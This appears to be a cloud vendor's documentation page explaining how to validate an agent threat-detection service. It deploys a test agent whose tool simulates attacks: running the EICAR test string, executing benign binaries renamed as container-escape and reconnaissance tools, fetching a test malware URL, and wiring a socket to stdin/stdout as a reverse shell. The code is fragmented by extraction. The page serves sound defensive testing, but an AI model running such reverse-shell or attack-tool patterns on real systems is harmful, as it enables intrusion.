Test Agent Engine Threat Detection

This page explains how to verify that Agent Engine Threat Detection is working by intentionally triggering detectors and checking for findings. Agent Engine Threat Detection is a built-in service of Security Command Center.

Before you begin

To detect potential threats to your Vertex AI Agent Engine agents, ensure that the Agent Engine Threat Detection service is enabled in Security Command Center.

Set up environment

To test Agent Engine Threat Detection, set up a demo agent that simulates malicious activity.

Create project and activate shell

Select or create a Google Cloud project to use for testing.

To test detectors, you can use the Google Cloud console and Cloud Shell.

  1. Go to the Google Cloud console .

    Go to the Google Cloud console

  2. Select the project that you will use to test.

  3. Click Activate Cloud Shell.

You can also run the testing instructions from a local shell.

Set up Vertex AI Agent Engine

If you haven't used Vertex AI Agent Engine in this project before, Set up the Vertex AI Agent Engine environment before starting. Record the name of the Cloud Storage staging bucket that you created. We also recommend that you follow the Vertex AI Agent Engine quickstart to learn how to develop and deploy an agent with the Vertex AI SDK.

Create test script

You will create several files that will be used to deploy a new agent for testing. Use a text editor for this, such as nano .

  1. Create a new file named requirements.txt with the following contents.

     google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic 
    
  2. Create a new empty file called installation_scripts/install.sh . Some tests require adding content to this file.

  3. Create a new file called main.py , with the following contents. Replace the PROJECT_ID , LOCATION , and STAGING_BUCKET variables. The staging bucket name must include the gs:// prefix.

      import 
      
     asyncio 
     import 
      
     os 
     import 
      
     subprocess 
     import 
      
     socket 
     import 
      
      vertexai 
     
     from 
      
     vertexai 
      
     import 
     Client 
     , 
      agent_engines 
     
     from 
      
     google.adk.agents 
      
     import 
     llm_agent 
     from 
      
     google.adk.sessions.in_memory_session_service 
      
     import 
     InMemorySessionService 
     # Replace with your own project, location, and staging bucket. 
     LOCATION 
     = 
     " LOCATION 
    " 
     PROJECT_ID 
     = 
     " PROJECT_ID 
    " 
     # Staging bucket must have gs:// prefix 
     STAGING_BUCKET 
     = 
     " STAGING_BUCKET 
    " 
     client 
     = 
     Client 
     ( 
     project 
     = 
     PROJECT_ID 
     , 
     location 
     = 
     LOCATION 
     ) 
     def 
      
     _run_command 
     ( 
     args 
     , 
     ** 
     kwargs 
     ): 
     output 
     = 
     f 
     "Called 
     { 
     ' ' 
     . 
     join 
     ( 
     args 
     ) 
     } 
     \n 
     " 
     try 
     : 
     res 
     = 
     subprocess 
     . 
      run 
     
     ( 
     args 
     , 
     capture_output 
     = 
     True 
     , 
     text 
     = 
     True 
     , 
     ** 
     kwargs 
     ) 
     if 
     res 
     . 
     stdout 
     : 
     output 
     += 
     f 
     "Result: 
     { 
     res 
     . 
     stdout 
     . 
     strip 
     () 
     } 
     \n 
     " 
     if 
     res 
     . 
     stderr 
     : 
     output 
     += 
     f 
     "Error: 
     { 
     res 
     . 
     stderr 
     . 
     strip 
     () 
     } 
     \n 
     " 
     except 
     subprocess 
     . 
     TimeoutExpired 
     : 
     output 
     += 
     "Command timed out as expected." 
     return 
     output 
     # Tool to simulate threats. The function body will be replaced for individual 
     # detector tests. 
     def 
      
     threat_detection_test 
     (): 
     output 
     = 
     _run_command 
     ([ 
     "sleep" 
     , 
     "60" 
     ]) 
     output 
     += 
     _run_command 
     ([ 
     "echo" 
     , 
     "this is a fake threat" 
     ]) 
     output 
     += 
     _run_command 
     ([ 
     "sleep" 
     , 
     "10" 
     ]) 
     return 
     output 
     root_agent 
     = 
     llm_agent 
     . 
     Agent 
     ( 
     model 
     = 
     "gemini-2.5-flash" 
     , 
     name 
     = 
     "threat_detection_test_agent" 
     , 
     description 
     = 
     "Runs threat detection test." 
     , 
     instruction 
     = 
     """ 
     You are an agent that runs a threat detection test using a fake malicious 
     command. 
     """ 
     , 
     tools 
     = 
     [ 
     threat_detection_test 
     ], 
     ) 
     async 
     def 
      
     main 
     (): 
      vertexai 
     
     . 
     init 
     ( 
     project 
     = 
     PROJECT_ID 
     , 
     location 
     = 
     LOCATION 
     , 
     staging_bucket 
     = 
     STAGING_BUCKET 
     , 
     ) 
     app 
     = 
      agent_engines 
     
     . 
      AdkApp 
     
     ( 
     agent 
     = 
     root_agent 
     , 
     session_service_builder 
     = 
     InMemorySessionService 
     ) 
     remote_agent 
     = 
     client 
     . 
      agent_engines 
     
     . 
     create 
     ( 
     agent 
     = 
     app 
     , 
     config 
     = 
     { 
     "display_name" 
     : 
     "scc_threat_test_agent" 
     , 
     "identity_type" 
     : 
      vertexai 
     
     . 
      types 
     
     . 
      IdentityType 
     
     . 
      AGENT_IDENTITY 
     
     , 
     "requirements" 
     : 
     [ 
     "google-cloud-aiplatform[agent_engines,adk]" 
     , 
     "cloudpickle" 
     , 
     "pydantic" 
     , 
     ], 
     "staging_bucket" 
     : 
     STAGING_BUCKET 
     , 
     "extra_packages" 
     : 
     [ 
     "installation_scripts/install.sh" 
     , 
     ], 
     }, 
     ) 
     print 
     ( 
     "Deployed agent: " 
     , 
     remote_agent 
     . 
      api_resource 
     
     . 
     name 
     ) 
     try 
     : 
     async 
     for 
     event 
     in 
     remote_agent 
     . 
      async_stream_query 
     
     ( 
     user_id 
     = 
     "threat_detection_tester" 
     , 
     message 
     = 
     "Run the threat detection test" 
     , 
     ): 
     print 
     ( 
     event 
     ) 
     finally 
     : 
     client 
     . 
      agent_engines 
     
     . 
     delete 
     ( 
     name 
     = 
     remote_agent 
     . 
      api_resource 
     
     . 
     name 
     , 
     force 
     = 
     True 
     ) 
     if 
     __name__ 
     == 
     "__main__" 
     : 
     asyncio 
     . 
      run 
     
     ( 
     main 
     ()) 
     
    

Set up virtual environment

  1. Create and activate a Python virtual environment.

       
    python3  
    -m  
    venv  
    env  
     source 
      
    env/bin/activate 
    
  2. Install necessary dependencies in the virtual environment.

     pip  
    install  
    -r  
    requirements.txt 
    

Test the script

Run the script from inside the virtual environment with python3 main.py . This command will take several minutes to build, deploy, and execute the test agent.

The script outputs the resource name of the deployed agent, and a few JSON objects including an LLM response and other metadata. If you encounter permission errors or deployment errors at this stage, consult troubleshooting for next steps.

Test detectors

To test Agent Engine Threat Detection detectors, replace the code in the threat_detection_test function with code that simulates an attack. The script can take a long time to deploy and query the agent. To speed up testing, you can combine the contents of several of these functions together.

Execution: Added Malicious Binary Executed

Replace the threat_detection_test function in the test script, and then run the test script.

  def 
  
 threat_detection_test 
 (): 
 output 
 = 
 _run_command 
 ([ 
 "sleep" 
 , 
 "60" 
 ]) 
 eicar 
 = 
 r 
 "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" 
 output 
 += 
 _run_command 
 ([ 
 "touch" 
 , 
 "/tmp/test_mal_file" 
 ]) 
 with 
 open 
 ( 
 "/tmp/test_mal_file" 
 , 
 "w" 
 ) 
 as 
 f 
 : 
 f 
 . 
 write 
 ( 
 eicar 
 ) 
 output 
 += 
 _run_command 
 ([ 
 "chmod" 
 , 
 "700" 
 , 
 "/tmp/test_mal_file" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "sh" 
 , 
 "-c" 
 , 
 "/tmp/test_mal_file" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "sleep" 
 , 
 "10" 
 ]) 
 return 
 output 
 

Execution: Added Malicious Library Loaded

Replace the threat_detection_test function in the test script, and then run the test script. You might receive an error from the Vertex AI SDK about parsing the response, but the finding is still generated.

  def 
  
 threat_detection_test 
 (): 
 output 
 = 
 _run_command 
 ([ 
 "sleep" 
 , 
 "60" 
 ]) 
 eicar 
 = 
 r 
 "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" 
 with 
 open 
 ( 
 "/tmp/test_mal_lib" 
 , 
 "w" 
 ) 
 as 
 f 
 : 
 f 
 . 
 write 
 ( 
 eicar 
 ) 
 with 
 open 
 ( 
 "/tmp/loader.c" 
 , 
 "w" 
 ) 
 as 
 f 
 : 
 f 
 . 
 write 
 ( 
 """ 
 #include <fcntl.h> 
 #include <sys/mman.h> 
 #include <sys/stat.h> 
 #include <unistd.h> 
 #include <stdlib.h> 
 int main(int argc, char *argv[]) { 
 int fd = open(argv[1], O_RDONLY); 
 struct stat sb; 
 fstat(fd, &sb); 
 void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0); 
 write(1, addr, sb.st_size); 
 munmap(addr, sb.st_size); 
 close(fd); 
 return 0; 
 } 
 """ 
 ) 
 output 
 += 
 _run_command 
 ([ 
 "gcc" 
 , 
 "/tmp/loader.c" 
 , 
 "-o" 
 , 
 "/tmp/loader" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "/tmp/loader" 
 , 
 "/tmp/test_mal_lib" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "sleep" 
 , 
 "10" 
 ]) 
 return 
 output 
 

Execution: Container Escape

Replace the threat_detection_test function in the test script, and then run the test script.

  def 
  
 threat_detection_test 
 (): 
 output 
 = 
 _run_command 
 ([ 
 "sleep" 
 , 
 "60" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "cp" 
 , 
 "/bin/ls" 
 , 
 "/tmp/botb-linux-amd64" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "chmod" 
 , 
 "700" 
 , 
 "/tmp/botb-linux-amd64" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "/tmp/botb-linux-amd64" 
 , 
 "-autopwn" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "sleep" 
 , 
 "10" 
 ]) 
 return 
 output 
 

Execution: Kubernetes Attack Tool Execution

Replace the threat_detection_test function in the test script, and then run the test script.

  def 
  
 threat_detection_test 
 (): 
 output 
 = 
 _run_command 
 ([ 
 "sleep" 
 , 
 "60" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "cp" 
 , 
 "/bin/ls" 
 , 
 "/tmp/amicontained" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "/tmp/amicontained" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "sleep" 
 , 
 "10" 
 ]) 
 return 
 output 
 

Execution: Local Reconnaissance Tool Execution

Replace the threat_detection_test function in the test script, and then run the test script.

  def 
  
 threat_detection_test 
 (): 
 output 
 = 
 _run_command 
 ([ 
 "sleep" 
 , 
 "60" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "cp" 
 , 
 "/bin/ls" 
 , 
 "/tmp/linenum.sh" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "/tmp/linenum.sh" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "sleep" 
 , 
 "10" 
 ]) 
 return 
 output 
 

Execution: Modified Malicious Binary Executed

  Replace 
  
 the 
  
 `threat_detection_test` 
  
 function 
  
 in 
  
 the 
  
 test 
  
 script 
 , 
  
 and 
  
 then 
  
 run 
  
 the 
 test 
  
 script 
 . 
 ` 
 `` 
 python 
 def threat_detection_test(): 
 eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" 
 output = _run_command(["sleep", "60"]) 
 output += _run_command(["chmod", "-R", "777", "/code"]) 
 with open("/code/entrypoint.sh", "w") as f: 
 f.write(eicar) 
 

output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

Execution: Modified Malicious Library Loaded

Replace the threat_detection_test function in the test script, and then run the test script.

  def 
  
 threat_detection_test 
 (): 
 eicar 
 = 
 r 
 "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" 
 output 
 = 
 _run_command 
 ([ 
 "sleep" 
 , 
 "60" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "chmod" 
 , 
 "-R" 
 , 
 "777" 
 , 
 "/code" 
 ]) 
 with 
 open 
 ( 
 "/code/entrypoint.sh" 
 , 
 "w" 
 ) 
 as 
 f 
 : 
 f 
 . 
 write 
 ( 
 eicar 
 ) 
 with 
 open 
 ( 
 "/tmp/loader.c" 
 , 
 "w" 
 ) 
 as 
 f 
 : 
 f 
 . 
 write 
 ( 
 """ 
 #include <fcntl.h> 
 #include <sys/mman.h> 
 #include <sys/stat.h> 
 #include <unistd.h> 
 #include <stdlib.h> 
 int main(int argc, char *argv[]) { 
 int fd = open(argv[1], O_RDONLY); 
 struct stat sb; 
 fstat(fd, &sb); 
 void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0); 
 write(1, addr, sb.st_size); 
 munmap(addr, sb.st_size); 
 close(fd); 
 return 0; 
 } 
 """ 
 ) 
 output 
 += 
 _run_command 
 ([ 
 "gcc" 
 , 
 "/tmp/loader.c" 
 , 
 "-o" 
 , 
 "/tmp/loader" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "/tmp/loader" 
 , 
 "/code/entrypoint.sh" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "sleep" 
 , 
 "10" 
 ]) 
 return 
 output 
 

Malicious URL Observed

Update the installation_scripts/install.sh file with the following contents.

  #!/bin/bash 
apt-get  
install  
-y  
curl  
--no-install-recommends 

Replace the threat_detection_test function in the test script, and then run the test script.

  def 
  
 threat_detection_test 
 (): 
 url 
 = 
 "https://testsafebrowsing.appspot.com/s/malware.html" 
 output 
 = 
 _run_command 
 ([ 
 "sleep" 
 , 
 "60" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "curl" 
 , 
 url 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "sleep" 
 , 
 "10" 
 ]) 
 return 
 output 
 

Reverse Shell

Replace the threat_detection_test function in the test script, and then run the test script.

  def 
  
 threat_detection_test 
 (): 
 output 
 = 
 _run_command 
 ([ 
 "sleep" 
 , 
 "60" 
 ]) 
 output 
 += 
 _run_command 
 ([ 
 "cp" 
 , 
 "/bin/echo" 
 , 
 "/tmp/sh" 
 ]) 
 s 
 = 
 socket 
 . 
 socket 
 ( 
 socket 
 . 
 AF_INET 
 , 
 socket 
 . 
 SOCK_STREAM 
 ) 
 s 
 . 
 connect 
 (( 
 "8.8.8.8" 
 , 
 53 
 )) 
 subprocess 
 . 
 run 
 ([ 
 "/tmp/sh" 
 ], 
 stdin 
 = 
 s 
 , 
 stdout 
 = 
 s 
 , 
 stderr 
 = 
 s 
 , 
 timeout 
 = 
 5 
 ) 
 output 
 += 
 _run_command 
 ([ 
 "sleep" 
 , 
 "10" 
 ]) 
 return 
 output 
 

What's next

Design a Mobile Site
View Site in Mobile | Classic
Share by: